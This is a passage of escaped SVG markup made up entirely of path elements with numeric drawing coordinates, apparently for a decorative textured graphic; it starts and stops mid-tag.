d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n        <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n        <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n        <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n        <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n        <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n        <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n        <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n        <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n        <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n        <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n        <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n        <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n        <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n        <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n        <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n        <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n        <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n        <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n        <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n        <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n        <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n        <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n        <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n        <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n        <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n        <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n        <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n        <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n        <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n        <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n        <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n        <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n        <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n        <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n        <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n        <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n        <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n        <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n        <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n        <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n        <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n        <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n        <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n        <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n        <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n        <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n        <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n        <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n        <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n        <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n        <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n        <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n        <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n        <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n        <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n        <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n        <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n        <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n        <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n        <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n        <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n        <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n        <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n        <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n        <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n        <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n        <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n        <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n        <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n        <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n        <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n        <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n        <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n        <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n        <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n        <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n        <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n        <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n        <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n        <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n        <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n        <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n        <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n        <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n        <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n        <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n        <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n        <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n        <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n        <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n        <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n        <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n        <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n        <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n        <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n        <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n        <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n        <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n        <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n        <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n        <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n        <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n        <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n        <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n        <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n        <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n        <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n        <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n        <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n        <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n        <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n        <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n        <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n        <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n        <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n        <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n        <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n        <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n        <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n        <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n        <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n        <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n        <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n        <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n        <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n        <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n        <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n        <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n        <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n        <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n        <path 